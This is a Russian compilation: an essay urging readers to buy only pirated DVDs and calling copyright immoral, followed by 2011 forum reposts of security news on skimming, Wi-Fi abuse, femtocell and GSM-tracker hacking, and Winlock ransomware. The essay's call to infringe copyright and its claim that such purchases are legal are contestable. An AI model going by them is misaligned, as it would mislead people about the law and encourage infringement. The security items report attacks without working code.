"Поломка компонентов" - самая, пожалуй страшная угроза (и картинка соответствующая). Мы вместе с ближайшими знакомыми ("первого порядка", т.е. личный контакт) владеем суммарно полутысячей пиратских дисков. Ни одной поломки. Если добавить что я ни разу не слышал о случаях поломки у РЕАЛЬНЫХ людей (общих знакомых и пр., "второго порядка") - цифра увеличится до тысячи. Сэкономлено 1000*(25-5)=20000$ (25 - стоимость "лицензии", 5 - стоимость по которой мы берём диски). Это - 100 DVD-плееров! Даже если каждый тысячный диск будет ПОЛНОСТЬЮ ломать плеер можно вместо каждого сломанного покупать десяток новых и ещё останется на приличную новую иномарку (в смысле - автомобиль). Возможно "кое-где у нас порой" у кого-то что-то и ломалось. Но такие же слухи я читал и о лицензионных дисках, в частности об "Игре". Поскольку делаются все диски на одинаковых линиях, вероятность поломки, очевидно, одинаковая.
"Незащищённый производителем продукт". От кого? От покупателя высокой ценой :-)? От копирования? Так мне наоборот (как потребителю) удобнее если можно и родственникам на видеокассету сбросить, и в собственный фильм кусочек рипнуть... Короче, непонятный пункт.
"Некачественно... без контроля...". А откуда господа рекламодатели это взяли - за спиной что ли стояли? Может он есть - контроль? А по качеству бывает и наоборот - перевод пиратов ЛУЧШЕ чем на лицензии. Видео - всегда одинаковое. А неотключаемые субтитры на английской дорожке в лицензионных дисках я бы качеством не называл...
"Лишает возможности увидеть НОВЫЕ ..." - всё с точностью до наоборот, особенно если пиратский перевод выходит на несколько месяцев раньше и иногда официального релиза вообще НЕТ В ПРИРОДЕ. Т.е. пиратский диск ДАЁТ МНЕ ВОЗМОЖНОСТЬ увидеть как раз НОВЫЕ программы, а не ограниченный круг запоздавших официальных релизов... А с учётом ограниченности бюджета обычного росиянина ещё интереснее получается. Допустим у меня на видео выделено 30 долларов в месяц. Если я буду покупать только лицензию - я посмотрю в год всего 12 фильмов. А если пиратку - 72 фильма. На 60 фильмов больше!!! Т.е. использование ТОЛЬКО ПИРАТСКИХ дисков даёт мне возможность по сравнению с лицензией посмотреть 60 "НОВЫХ ИНТЕРЕСНЫХ ПРОГРАММ"!!! Что-то господа рекламодатели напутали :-)
"Лишает возможности снизить цену..." - нас что, за идиотов держат? Когда пиратов не было и диски только начинались цена стояла как вкопанная годами - 25-30 баксов. И только с появлением массового пиратского рынка стали появляться всяческие "уценки", "акции", "распродажи" и пр. НЕКОТОРЫХ залежалых лицензионных дисков. Это же элементарный закон рынка - нет конкуренции - имеем монопольные высокие цены. Появляется конкуренция - идёт снижение цены. А не наоборот. О возможных возражениях про окупаемость отчислений "буржуям" я скажу в следующей главе. К тому же не умеют И НЕ ХОТЯТ договариваться с "буржуями". Игровики компьютерные (как правильно отметил М.Лядов) - научились - многие недорогие переводы игр продаются ОФИЦИАЛЬНО.
"Создаёт экономические трудности..." - ну наконец-то хоть одно слово правды! :-) Только мне как потребителю до чужих трудностей дела нет. Продукция AMD тоже создаёт экономические трудности компании Intel - ну и что? Мне от этого только лучше - процессоры становятся быстрее и дешевле...
"Вопрос Вашего престижа". Помните анекдот про новых русских и галстук за штуку баксов ("дурак ты - я знаю место где такой же ТРИ штуки стоит")? Если престиж понимать как "распальцованность" и желание купить "такой же но по ТРИ" - то реклама права. Но я бы это назвал глупостью, а не престижем. Нам не "шашечки" - нам ЕХАТЬ!!!

В качестве аналогии представьте плакат с эмблемой кока-колы на черепе с костями и подписью НЕ ПОКУПАЙТЕ КОКА-КОЛУ, потому что она:

может убить Вас (действительно, наверняка же зафиксирован хоть один случай когда кто-то подавился)
часто приводит к простуде (действительно, от холодной коки со льдом жарким летом бывает...)
содержит консерванты и другие синтетические вредные для здоровья добавки
злоупотребление вредит желудку
Мешает нам выпускать новые виды ПЕПСИ для ВАС (синие, зелёные, :-))
не престижна и не современна, полный отстой, годится лишь для Санты - старого пи**ра! Бритни никогда не пьёт эту гадость :-)

И подпись: компания Пепсико. Как вы думаете - подали бы на неё в суд за недобросовестную рекламу? А ведь разницы с "антипиратской" рекламой - никакой!

(лично я ничего не имею против Кока-Колы и против Пепси тоже. Пример взят только для сравнения, все совпадения с реальными продуктами случайны и т.д. и т.п. Обе воды - замечательные :-))
И, наконец, сведённые в таблицу основные свойства (достоинства и недостатки) лицензионных и пиратских дисков (ВТОРОЙ группы, т.к. диски первой группы просто идентичны лицензионным и отличаются лишь впятеро меньшей ценой)
Свойство/качество Лицензия Пиратские диски (ВТОРАЯ ГРУППА)
Цена, $ (розница/мелк.опт) 25-30/15-20 5-7/4-5
Видео (основной фильм) Оригинал Оригинал
Русский звук Дубляж либо закадровый, обычно многоголосый. Обычно хуже оригинала, но не намного. Бывает и заметно хуже. Закадровый, многоголосый или двухголосый, иногда одноголосый. Качество звука примерно как у лицензии, иногда даже лучше. Качество перевода - по разному (иногда лучше лицензии, иногда хуже).
Оригинальный звук Оригинал. Русские субтитры есть. Иногда - НЕОТКЛЮЧАЕМЫЕ, т.е. "совсем оригинальный" фильм не посмотришь... Оригинал. Иногда НЕТ русских субтитров.
Бонусы (дополнения) Обычно есть, хотя часто более скудные чем в оригинале. Иногда без перевода. Часто отсутствуют. Почти всегда без перевода. Изредка присутствует меню бонусов без их фактического наличия, что приводит к глюкам при попытке их вызвать (вылет в главное меню например).
Ассортимент Некий (не знаю как оценить по абсолютной шкале). Намного шире - все оригиналы плюс новые фильмы, плюс не выходившие вообще на R5 переводы, плюс много копий без переводов - музыка и порнуха.
Меню По-разному. Иногда - как в оригинале, иногда - переделанное, как правило - корректное и часто анимированное. Обычно упрощённое или переделанное, часто - статичное. Изредка - местами глючное (при удалении бонусов или при выборе звука). Бывает что звук можно выбрать ТОЛЬКО кнопкой аудио на пульте (меню не работает), бывает и наоборот - русская версия доступна только через меню, а кнопкой аудио не выбирается. В любом случае до фильма с нужным звуком так или иначе добраться можно, а вот остальные рюшечки-фенечки не гарантированы.
Брак, возврат, гарантии Статистика небольшая. Из пары десятков лицензионных дисков у меня сильно глючил и тормозил один, но только на дорогом Филипсе. Менять отказались, т.к. на плеере в магазине всё было в норме. Переход на ББК снял проблему. По идее (при наличии чека) обмен явного брака не вызывает сомнений. Из прошедших через мои руки (для себя и друзей) трёх сотен дисков не считывались три и сильно глючил один. Все четыре были без проблем возвращены продавцу в обмен на деньги. При нормальном продавце возврат вполне реален. Но даже если просто ВЫБРАСЫВАТЬ бракованные при такой статистике (всего 1,3%!!!) это с лихвой покроется огромной разницей в цене с лицензионными дисками (отнюдь не один процент!)
Неотключаемая реклама в начале Бывает, иногда длинная (до пяти минут). Особенно странно наличие рекламы фильмов с насилием/кровью на ДЕТСКИХ дисках с мультиками :-(. Патологическая жадность - содрать 30 долларов с потребителя и ещё ЗАСТАВЛЯТЬ его смотреть рекламу за собственные деньги! Не встречал
Большая ложь, или о себестоимости...

Не давайте им ничего! Пока вы даёте - они будут просить!
(Марк Розовский на спектакле "Песни нашего двора")

Я работаю бухгалтером (в России, если кто пока не въехал!). Представьте себе такую абсурдную ситуацию: допустим я прихожу к директору и говорю, что для продуктивной работы мне нужно где-то жить и чем-то питаться, и ещё как-то на работу добираться - правильно? - вот счёт из гостиницы "Россия" на триста пятьдесят долларов в день за люкс, вот счёт из ресторана на сто баксов и вот счёт от транспортной компании за лимузин на пятьдесят. Итого в день 500. А в месяце их 30. А ведь ещё одежда (счёт из бутика), развлечения(счёт из ночного клуба) и пр... Короче хочу зарплату 20000$ в месяц!!! Далее возможны три основных варианта:

Директор в плохом настроении или у него нет чувства юмора. Уволит сразу!!!
У директора есть чувство юмора. Предложит ПОДТЕРЕТЬСЯ этими счетами, сходить опохмелиться и больше таких глупостей не говорить.
Директор - идиот. Он проверит счета, перезвонит в гостиницу. Если всё так и есть (т.е.счета подлинные и я его НЕ ОБМАНУЛ), вздохнёт и выпишет зарплату $20000.

Последний вариант кажется абсурдным, но миллионы доверчивых кинозрителей издатели держат именно за таких идиотов. Зрители вздыхают и платят. За билеты. За кассеты. За DVD-диски. По счетам, завышенным в сотни раз (а не в 10-20 как в примере со СКРОМНЫМ бухгалтером). Кино-видео-аудиоиндустрия поставила всё с ног на голову. Они говорят нам: "мы вложили в этот фильм сто миллионов долларов - мы наняли ДЛЯ ВАС лучших звёзд и заплатили им по пять миллионов каждому, на вторые роли тоже очень хорошие актёры (по миллиону), мы снимали лучшими камерами в лучших студиях (столько-то миллионов), мы оборудовали звуковые студии исключительно колонками "Наутилус" и кабелями "НордОст Валхалла"(12000$ за один кусок кабеля) и прочей отличной аппаратурой! Мы заплатили за авторинг ("вы знаете сколько в америке стоит авторинг?") столько-то, за эффекты столько-то. МЫ ВЫНУЖДЕНЫ делать дорогие диски и дорогие лицензии чтобы окупить этот грандиозный проект".

А знаете как они думают на самом деле (я сознательно упрощаю, не разделяя прокат, диски, кассеты, перевод, лицензирование и пр. Принцип остаётся, хоть структура и сильно усложняется)? "Так, при таком сценарии фильм посмотрят как минимум 10 миллионов человек. Эти идиоты до сих пор готовы платить нам по 30 баков, т.о. мы имеем 300милиионов бюджета. Ну половину мы сразу оставим себе и на налоги. А на оставшиеся 150 мы вполне в состоянии нанять ДиКаприо за десять лимонов, заплатить за спецэффекты 30 лимонов и т.д. и т.п.(далее следует фактически бизнес-план).

Что любопытно, с гонорарами "звёзд" нас умудряются обмануть ДВАЖДЫ. Первый раз - когда заставляют их оплачивать (косвенно, через билеты и диски). А второй раз - когда НЕЯВНО РЕКЛАМИРУЮТ фильм. Действительно, простой идиот думает: "если актёр получает за фильм десять лимонов - это звезда! А если в фильме несколько звёзд - это видимо очень крутой фильм! Надо сходить!". Эта составляющая, "маркетинговая", наиболее сильна в Америке, где многое мерится деньгами и астрономические суммы гонораров лучше всего "доказывают" "крутость" звезды наивным потребителям.

Для меня совершенно очевидно, что если снизить бюджет всех фильмов НА ПОРЯДОК, качество НИСКОЛЬКО не пострадает. Возьмём к примеру гонорары актёров. Сколько получили за свои известные роли Миронов, Папанов, Леонов, Янковский, Вицин, Никулин и т.п.? Сотни и тысячи долларов (советский рубль примерно равен доллару). Сколько ДиКаприо, Сталлоне, Шварценнегер и т.п.? Миллионы и десятки милионов. Разница НА ЧЕТЫРЕ ПОРЯДКА!!! Неужели они во столько раз лучше сыграли? Мне лично кажется что нет, я бы сказал даже наоборот :-). Талант не покупается за миллионы. Я и за миллиард не сыграю как Леонов или Миронов... Талантливые актёры будут хорошо играть и за десятки тысяч долларов (если рядом не предложат миллионы, разумеется).
Со стоимостью оборудования два порядка не наэкономишь, но один - запросто! Многое "профессиональное" оборудование имеет явно завышенную цену. Оно столько "стоит" только потому что богатые "киношники" его берут. Как только прекратят брать - подешевеет в десять раз. Чтобы не спорить о хитрых мало кому известных устройствах, возьмём совсем простой пример из компьютерной области (двухлетней давности, сейчас цен не знаю). 80-жильный АТА-100-шлейф стоил грубо 1 доллар. 50-жильный SCSI-шлейф - грубо 5 долларов. Технология ОДИНАКОВАЯ, провода ОДИНАКОВЫЕ, обжимает ОДИН И ТОТ ЖЕ автомат. Себестоимость очевидно тоже примерно одинаковая. Просто SCSI - это для серверов, это "круто", там "крутятся большие деньги". Куча других известных примеров, например "японский воздух"(выражение я услышал от А.Тутубалина) - фирменные бленды к дорогим объективам Canon (наверное у других брендов так же, я не интересовался) стоят 30-40 долларов. Это - просто пластмассовое колечко, штамповка на термопластавтомате. Но - раз заплатил штуку за объектив, значит ты крутой - плати и за воздух из Японии, который везут внутри этого колечка...
Кроме всего прочего можно просто брать оборудование классом ниже. Я не понимаю зачем, скажем, в студии аудио кабеля за 12000$ за штуку. Если взять кабеля за 200$ 99% слушателей ничего не заметят на CD-диске, а на DVD ничего не заметят и все 100% (после сжатия в DD5.1).

Но для меня совершенно очевидно и то, что добровольно, ради нас, никто от своих денег не откажется. Что же делать? А то же что "директор с чувством юмора" - предложить им подтереться своими лицензиями, а самим ПОКУПАТЬ ТОЛЬКО ПИРАТСКУЮ ПРОДУКЦИЮ. Пока мы не перестанем платить Голливуду, мы будем кормить ДиКаприо и прочих лощёных "звёзд". ИМХО они таких денег не заслуживают. Как только весь мир привыкнет к новым ценам, видеоиндустрия вынуждена будет строить совсем другие, реальные, бизнес-планы. И станет обычной отраслью экономики производящей рыночные товары (фильмы) на рыночных условиях. Хорошие фильмы. Не хуже нынешних, по крайней мере. Но за четыре-пять долларов. Тогда и пираты сами вымрут - никто не будет покупать пиратский диск по 3-4 если рядом лежит лицензия по 4-5!
А как же закон?
Итак, я повторяю свой призыв и одновременно основной тезис этой статьи:

ПОКУПАЙТЕ ТОЛЬКО НЕЛИЦЕНЗИОННЫЕ ДИСКИ!!!

Специально для поганых лоеров, которые уже сели писать донос: покупка пиратского диска в УСТАНОВЛЕННЫХ местах (например в стационарных павильонах, иногда даже с пробиванием кассового чека) абсолютно законна. Потребитель не обязан быть экспертом и знать о происхождении продукции. Он ИМЕЕТ ПРАВО узнать об этом (спросить сертификаты, адрес производителя и пр.), но НЕ ОБЯЗАН этого делать. Проверять торговые точки должны компетентные органы... Таким образом я призываю граждан к ЗАКОННОМУ действию, т.е. не подпадаю под статью "подстрекательство" и тому подобные, а так же под "пропаганду противоправных действий в СМИ".

А теперь по существу. ИМХО нынешние законы о копирайте (особенно американские) глубоко аморальны и чем скорее их отменят - тем лучше. Они защищают кошельки маленькой прослойки зажравшихся "правообладателей" в ущерб большинству населения, поощряют монополизм, тормозят развитие технологий. Так уже было не раз. Не так давно рабство в Америке (и крепостное право в России) было абсолютно законным, хотя никто сейчас не назовёт его моральным. Законы всегда отстают - и их пересматривают. Я очень надеюсь что разум рано или поздно победит жадность и копирайт будет полностью отменён. По крайней мере в тех извращённых формах, которые существуют сейчас и которые пытаются внедрить последовательные "борцы с потребителем". Чего стоит например запрет на вырезание рекламы при записи телепрограмм. Такие устройства запрещены в некоторых странах, и, возможно, скоро это запретят делать и просто зрителям при просмотре :-) - переключил программу - а тебя под суд! И во все винчестеры мечтают встроить блютусовый "жучок" который будет стучать "в органы" при записи "нелицензионных" файлов ... А уж DVD-RW как мечтают запретить или поставить на учёт! :-) Кстати, если кто помнит, - раньше все ксероксы(пардон, КОПИРЫ) были на учёте у Большого Брата. Сейчас - нет, но почему-то я не вижу в продаже "пиратски отксеренных" копий газеты "МК" и книг Дарьи Донцовой :-) Очевидно, дешевле оригинал купить, чем "ксерить". Вот она - НОРМАЛЬНАЯ ситуация.
Копирайт или авторское право?

По дурацкому стечению обстоятельств ближайшим аналогом буржуйских законов о копирайте является наш закон "Об авторском праве...". Из-за этого их часто путают и приравнивают, хотя изначально это СОВЕРШЕННО РАЗНЫЕ понятия (что, кстати, хорошо видно из названия). Когда я КОПИРУЮ фильм(музыку, текст), дарю копии друзьям, меняюсь ими по Сети и т.д. и т.п. - я нарушаю именно копирайт. Но я не оспариваю АВТОРСТВА произведения - оно остаётся в титрах. Пираты тоже НЕ НАРУШАЮТ АВТОРСКИХ ПРАВ - они не меняют титров, не вкладывают в уста героям порочащих текстов при переводе и т.д., и т.п. - они лишь нарушают копирайт. Т.е. лишают издателей некоторой части прибыли, но НЕ ЛИШАЮТ ИСПОЛНИТЕЛЕЙ И РЕЖИССЁРОВ ИЗВЕСТНОСТИ (или "репутации"). Я - за АВТОРСКОЕ ПРАВО и против ПЛАГИАТА (т.е. например подмены титров, присвоения себе авторства и т.п.). Но (как уже говорилось ранее) я ПРОТИВ КОПИРАЙТА.

Рискну утверждать что даже при ПОЛНОЙ отмене копирайта но при сохранении авторских прав хорошая музыка и хорошие фильмы никуда не денутся. Даже если некий музыкант(в широком смысле) не будет получать с продажи дисков НИЧЕГО (например, все wav-ы в отличном качестве выложены в Сети и все диски откопированы "пиратами" и продаются по доллару, причём и то и другое совершенно законно), он всегда сможет заработать на жизнь концертами, автографами, фотографиями "на память" и прочим ублажением "фанатов", которых у ДЕЙСТВИТЕЛЬНО талантливого музыканта при почти бесплатных дисках будет гораздо больше, чем сейчас. Просто это - другая бизнес-модель. Если сейчас концертами "раскручивают" новый компакт-диск, то никто не мешает, наоборот, бесплатными дисками "раскручивать" дорогие концерты... Зато отпадает дурацкое желание RIAA и прочих подобных антинародных организаций "обуздать" развитие технологий - встраивать всякие аппаратные защиты в CD-R-приводы, портить CD-диски всякими "антипиратскими" закладками, мучать зрителей региональными кодами, макровижном и прочими гадостями, подсматривать через файлобменные сети у кого на компьютере какие файлы лежат и подавать в суд (читайте новости - уже несколько сот человек заплатили за скриншоты со своих компьютеров по несколько штук баксов!) и прочая, прочая...

Кстати, с самого начала я (как автор материалов этого сайта) придерживаюсь именно такой политики - все мои статьи свободны для копирования, но я настаиваю на своём авторском праве (ссылка на автора + целостность материала). Самое интересное, что при этом меня всё равно "пиратят".

Так, например, несколько моих статей нашлись на диске "Обработка DV-видео" из серии "глазами профессионала" от фирмы "Навигатор". Везде все мои координаты и ссылки на свой сайт тщательно удалены, в результате статьи абсолютно безымянные (как, впрочем, и статьи от "Сплайна"). На моё письмо с вопросом о смысле этой лишней работы по обезличиванию (я же не прошу денег, т.е. экономии на копирайте - никакой) я ответа не получил. Закравшиеся подозрения в недобросовестности фирмы "Навигатор" быстро подтвердились после знакомства с содержимым диска. Подборка программ - дурацкая и противоречивая, некоторые программы будут конфликтовать друг с другом, комментарии - смешные (даже с точки зрения продвинутого чайника типа меня, что уж тут говорить о профессионалах), а ГЛАВНОЕ - основные программы, в частности Улид6.5 РАБОТАТЬ КОРРЕКТНО НЕ БУДУТ!!! Это - крякнутые демки с кучей противных ограничений. У меня весь ящик завален вопросами - почему не захватывается более 500 кадров? Да потому что такие горе-пираты кладут триал-версии и нигде об этом не предупреждают... Так что если хотите РАБОТАЮЩИХ прогамм - НЕ ПОКУПАЙТЕ диски от "Навигатора"(на них ещё значок типа знака качества "удачная покупка").
http://www.afanas.ru/video/nolicenz.htm

SAWWA
13.07.2011, 02:23
В Европе нейтрализовали банду мошенников с кредитками

Lenta.ru


Европейские и американские спецслужбы и полиция 12 июля объявили о проведенной операции по нейтрализации международной банды, специализировавшейся на мошенничестве с кредитными картами, сообщает Agence France-Presse.

В рамках операции 6 июля одновременно были задержаны 47 человек в Болгарии, девять - в Италии, по два в Испании и США и один - в Польше.

Базировавшаяся в Болгарии банда занималась противозаконной деятельностью на протяжении девяти лет. За это время, полагают следователи, мошенники скопировали 15 тысяч кредитных карт и обналичили счета их владельцев на общую сумму около 50 миллионов евро.

Данные для копирования карт с магнитной полосой мошенники получали, когда небрежный обладатель кредитки пытался использовать фальшивый банкомат, установленный бандитами специально для этой цели. Машина денег не выдавала, но копировала все данные карты "клиента", включая его пин-код. После этого мошенники изготавливали дубликат карты и снимали с нее средства.

Обезвредить банду долгое время не могли, поскольку в нее входили очень опытные мошенники. В Европоле заявили, что эта группа мошенников была одной из самых организованных и разветвленных из тех, что попадались полицейским за последние пять лет.

SAWWA
14.07.2011, 02:23
http://www.onliner.by/news/13.07.2011/15.32/
Хакер получил 18 лет тюрьмы за терроризирование соседей через Wi-Fi
Автор: Константин Сидорович
История с Барри Ардольфом, точку в которой сегодня поставил американский суд, служит реальным примером того, как действия хакеров могут разрушить жизнь людей. 46-летнего киберпреступника приговорили к 18 годам тюремного заключения за то, что он терроризировал семью своего соседа, нелегально подключившись к его сети Wi-Fi, пишет Wired.

Все началось с того, что в 2009 году соседи Барри Ардольфа обвинили его в домогательстве к их четырехлетнему сыну. Супруги Костольник обратились с соответствующим заявлением в полицию, после чего Барри Ардольф решил отомстить соседям.
Мужчина взломал их Wi-Fi-сеть, создал через нее несколько почтовых ящиков и открыл страничку в MySpace под фамилией соседей. С этих аккаунтов Барри Ардольф рассылал материалы с детской порнографией друзьям и коллегам Костольников. Кроме того, он направил несколько писем с угрозами в адрес вице-президента США Джозефа Байдена и других политиков.

По словам Барри Ардольфа, он рассчитывал разрушить карьеру и брак соседей. Как отметили адвокаты, за несколько месяцев преступник нанес Костольникам колоссальную психологическую травму.

Читать полностью: http://www.onliner.by/news/13.07.2011/15.32

на самом деле пользуясь интернетом через левую сеть или по ворованному , взломанному доступу, остаются следы в виде параметров машины, с которой осуществлялись те или иные действия.. при активации Виндовс каждая машина получает свой уникальный код, сгеренированный на основе индивидуальных кодов составляющих к примеру ноутбук компонентов... СОРМ работает в определённых случаях эффективно

SAWWA
15.07.2011, 23:39
Фемтосоты Vodafone Sure Signal оказались уязвимыми

Павел Котов

Ресурс The Hackers Choice опубликовал подробную инструкцию по взлому фемтосот Sure Signal мобильного оператора Vodafone. Модификация прибора позволяет вторгаться в разговоры абонентов и записывать их, а также отправлять SMS-сообщения и совершать звонки от имени других абонентов. Это стало возможным благодаря единому паролю, предоставляющему доступ к фемтосоте с root-привилегиями. Однако еще необходимо физически удалить чип, при помощи которого Vodafone отслеживает местоположение передающего устройства.

В обычном режиме Vodafone требует, чтобы в Sure Signal был заранее зарегистрирован каждый мобильный телефон, подключающийся к передатчику, однако изменение программной части фемтосоты позволяет телефонам самопроизвольно подключаться к ней, как к обычной базовой станции. Когда такое происходит, злоумышленник получает возможность совершать звонки и отправлять SMS-сообщения от имени телефона, подключенного к Sure Signal, оставляя его номер и расходуя деньги с его счета.
23489
Еще одной возможностью является запись разговоров, совершаемых через этот передатчик, и их сохранение в формате AMR12.2. И, наконец, при помощи взломанной таким образом фемтосоты любой желающий может развернуть персональную сеть в любой точке мира, где присутствует широкополосное соединение, тогда как Vodafone не позволяет это делать за пределами страны, к которой приписана Sure Signal.
http://www.3dnews.ru/news/

SAWWA
27.07.2011, 02:19
В интернете завелся троян, ориентированный только на белорусских пользователей
Автор: Денис Блищ | 26.07.2011
Компания «ВирусБлокАда» сообщает о появлении «национального» Trojan.Winlock, ориентированного на белорусских пользователей Windows и требующего у них передать злоумышленникам некоторую сумму на электронный кошелек WebMoney. Об этом сообщается в официальном пресс-релизе.

Белорусский Winlock представляет собой исполняемый файл, написанный на языке высокого уровня Borland Delphi и упакованный криптором на языке программирования Visual Basic. Попадая в систему, троян записывает ссылку на самого себя в ветке системного реестра, которая отвечает за автозагрузку приложений. После этого троянская программа завершает процесс explorer.exe (рабочий стол) и taskmgr.exe (диспетчер задач). В результате блокируется нормальная работа Windows как в обычном, так и в безопасном режиме.

Читать полностью: http://www.onliner.by/news/26.07.2011/15.36

Окно программы, блокирующее рабочий стол Windows, сообщает:

«Ваш компьютер был заблокирован за просмотр, копирование и тиражирование видео материалов содержащих элементы педофилии и насилия над детьми.

Для разблокирования компьютера Вам необходимо заплатить штраф в размере 100000 белорусских рублей через терминал для оплаты сотовой связи, или в любом салоне сотовой связи, либо в пользу нашего партнера WebMoney на счет ВXXXXXXXXXXXX (в разделе "Другое" или "Электронные деньги") В случае оплаты суммы равной штрафу либо превышающей ее на фиксированном чеке терминала будет напечатан код разблокировки. Его нужно ввести в поле в нижней части окна и нажать кнопку "Разблокировать".

Если в течение 12 часов штраф не будет оплачен, все данные на Вашем персональном компьютере будут безвозвратно удалены, а дело будет передано в суд для разбирательства по статье 242 ч.1 УК Белоруссии.

Статья 242.1 Изготовление и оборот материалов или предметов с порнографическими изображениями несовершеннолетних.

Наказывается лишением свободы на срок от двух до четырех лет, либо без такового».

Следует отметить, что появление именно «белорусского» троянца-блокировщика, требующего от пользователя перевести некоторую сумму на электронный кошелек WebMoney, — это редкий случай. Код разблокировки троянца — 079156005.

SAWWA
29.07.2011, 00:04
Хакеры украли личные данные 35 миллионов корейцев
28.07.2011

Lenta.ru


Неизвестные хакеры атаковали популярный в Южной Корее интернет-портал Nate и социальную сеть Cyworld, передает Reuters со ссылкой на заявление южнокорейской Комиссии по связи.

В результате взлома злоумышленники получили доступ к личной информации 35 миллионов пользователей, включая имена и фамилии, номера телефонов и адреса электронной почты. Сообщается, что по масштабам кибератака стала одной из крупнейших в истории страны.

Оба атакованных веб-ресурса - портал Nate и соцсеть Cyworld - принадлежат компании SK Communications, которую, в свою очередь, контролирует южнокорейский сотовый оператор SK Telecom. Nate является третьим по популярности интернет-порталом в стране. В соцсети Cyworld зарегистрировано около 25 миллионов пользователей.

Полиция страны начала расследование инцидента. Представитель SK Communications сообщил, что взлом производился с IP-адресов, зарегистрированных в Китае. Об этом сообщает южнокорейское информагентство Yonhap.

SAWWA
30.07.2011, 02:03
есть такие способы как защитить ценности как материальные так и разные носители, при их перемещении в корпоративной среде и не только.. как одноразовые пломбы, индикаторные пакеты, всевозможные пластыри, наклейки, как к примеру, у нас в Питере (http://www.piter-t.ru/seal.html) есть подобного рода возможность 23520

SAWWA
04.08.2011, 22:40
http://www.3dnews.ru/offsyanka/614874/
http://www.zamkidveri.com/forum/images/imported/2011/08/3dn-1.gif?9782204
GSM-казачок, или Об одном небезопасном удобстве

Автор: Бёрд Киви

Дата: 02.08.2011

Все больше различных электронных устройств оснащаются GSM-модулем. Нам это нравится — ведь дистанционное управление техникой становится чрезвычайно удобным и легким. Берд Киви рассказывает о том, как легко в умелых руках удобство может превратиться в серьезную проблему

В первых числах августа в городе греха Лас-Вегасе традиционно проводится один из наиболее представительных хакерских форумов — Black Hat USA. Среди множества интересных докладов меня особенно задела презентация американского исследователя Дона Бэйли (Don Bailey), в ходе которой он демонстрирует, помимо прочего, просто чудовищную небезопасность новейших противоугонных систем для автомобилей
Системы такого рода сейчас считаются последним словом противоугонной техники, поскольку позволяют не только постоянно отслеживать географическое местоположение автомобиля, но и дистанционно управлять его важными функциями. Например, владелец может заглушить мотор и запереть двери. Однако оборотной стороной этих чудесных возможностей, как свидетельствует демонстрация Бэйли, является то, что с помощью ноутбука и подходящей программы теперь можно двери автомобиля открывать, а мотор — заводить, причем не имея вообще никаких ключей к «защищенной» машине.

Дон Бэйли и Мэтт Солник

Для того чтобы все это осуществить, умельцам даже не надо находиться вблизи автомобиля: контролировать функции машины злоумышленник может хоть с другого конца света, потому что управляющие команды поступают через сеть мобильной телефонной связи стандарта GSM в виде текстовых SMS-сообщений.

Дон Бэйли работает главным консультантом по безопасности в американской фирме iSEC Partners с особыми интересами к возможностям мониторинга в сетях мобильной связи. За последнее время Бэйли успел завоевать достаточно широкую известность благодаря своим исследованиям в области хакинга модулей GSM и GPS, обеспечивающих работу встроенных систем управления.

Нынешняя презентация Бэйли и его коллеги по iSEC Мэтта Солника (Matt Solnik) на конференции Black Hat в каком-то смысле является подведением итогов большой исследовательской работы и носит название «War Texting: Выявление и взаимодействие с устройствами, работающими в телефонной сети».

Если изложить суть этой работы в нескольких словах, то Бэйли обнаружил метод, позволяющий ему не только отыскивать и выявлять в сетях мобильной связи определенные типы модулей GSM, встроенных во всевозможные устройства, но также определять точное географическое местоположение этих модулей по координатам от подсистемы GPS (если таковая имеется). Кроме того, он установил, что может посылать модулям и свои собственные команды, устанавливая контроль над подсистемами управления.

Вот как это было

Стартовым толчком для большого исследования стала вполне бытовая история. После того как некие воры несколько раз попытались украсть автомобиль друга Дона Бэйли, наш герой подарил ему персональный GPS-локатор Zoombak. На крайний, что называется, случай — если похитителям все-таки удастся добиться своего, владелец машины все равно смог бы отследить ее местоположение и попробовать вернуть назад.

Примерно за $100 вы всегда будете знать — где находится ваш автомобиль. И не только вы…

В реальных условиях этот гипотетический сценарий применять не пришлось, однако Бэйли с его пытливой натурой получил возможность поковыряться в устройстве этого компактного приборчика. И после некоторого количества упражнений в хакинге обнаружил в «Зумбаке» изрядное количество «дыр», нивелирующих защитные свойства. В частности, он установил, что посторонний человек без особых проблем может отслеживать перемещения интересующего его устройства, подделывать сигнал идентификации для централизованной системы слежения Zoombak и даже выявлять другие аналогичные устройства поблизости.
23554
Все это, надо подчеркнуть, отнюдь не мелочи, принимая во внимание тот факт, что персональный GPS-локатор позиционируется на рынке как устройство обеспечения безопасности. То есть как технология для отслеживания местоположения и перемещения тех объектов, которые могут оказаться в беде или быть украдены, — вроде автомобилей, велосипедов, домашних животных или даже детей. Однако Бэйли установил, что будь он злоумышленником, то вполне смог бы сначала отыскать, где находится интересующий его объект, а затем убедить систему слежения в том, что объект находится в другом месте. В частности, он без проблем обманул систему Zoombak, заставив ее считать, что принадлежащее ему устройство волшебным образом перенеслось в Афганистан, хотя на самом деле оно продолжало оставаться в США.

Если немного углубиться в техническую сторону этого хакинга, то Бэйли обнаружил, что GPS-локатор, по сути дела, представляет собой всего лишь микроконтроллер, управляемый через сеть GSM. Тогда Бэйли, опираясь на свои прошлые эксперименты с сотовыми сетями, разработал метод для розыска такого рода устройств непосредственно через GSM и начал посылать им сообщения, опираясь на перехват сигналов, сопровождавших работу его собственного «Зумбаки». Вскоре выяснилось, что можно отправлять другим устройствам SMS-сообщения, заставляющие их передавать свои данные на заданный IP-адрес. В частности, по команде хакера эти устройства стали отсылать ему свои GPS-координаты местоположения — с любой нужной периодичностью.

Жизнь в мегаполисе внушает ложное ощущение анонимности: вокруг так много людей и машин, что захочешь найти кого-то одного — и не сможешь. Тем не менее, уравнение со множеством неизвестных при некоторой сноровке можно свести к простому квадратному

На первый взгляд может показаться, что выявить телефонный номер конкретного GPS-локатора среди миллионов прочих номеров, зарегистрированных в разных сетях, — практически нереальная задача. Однако в случае системы Zoombak все оказалось не так и сложно. К примеру, Бэйли знал, что она работает исключительно через сеть T-Mobile. При этом биллинговый адрес для телефонного номера, привязанного к устройству, принадлежал компании, изготовившей прибор, а не конкретному владельцу GPS-локатора. В базе данных об абонентах (caller ID database) все эти номера фигурировали как «безымянные», что также существенно сокращало количество вариантов для устройств, которые он пытался отыскать в сети. В конечном же счете Бэйли установил, что может автоматически выявлять интересующие его устройства с внушительной долей успеха порядка 86 процентов.

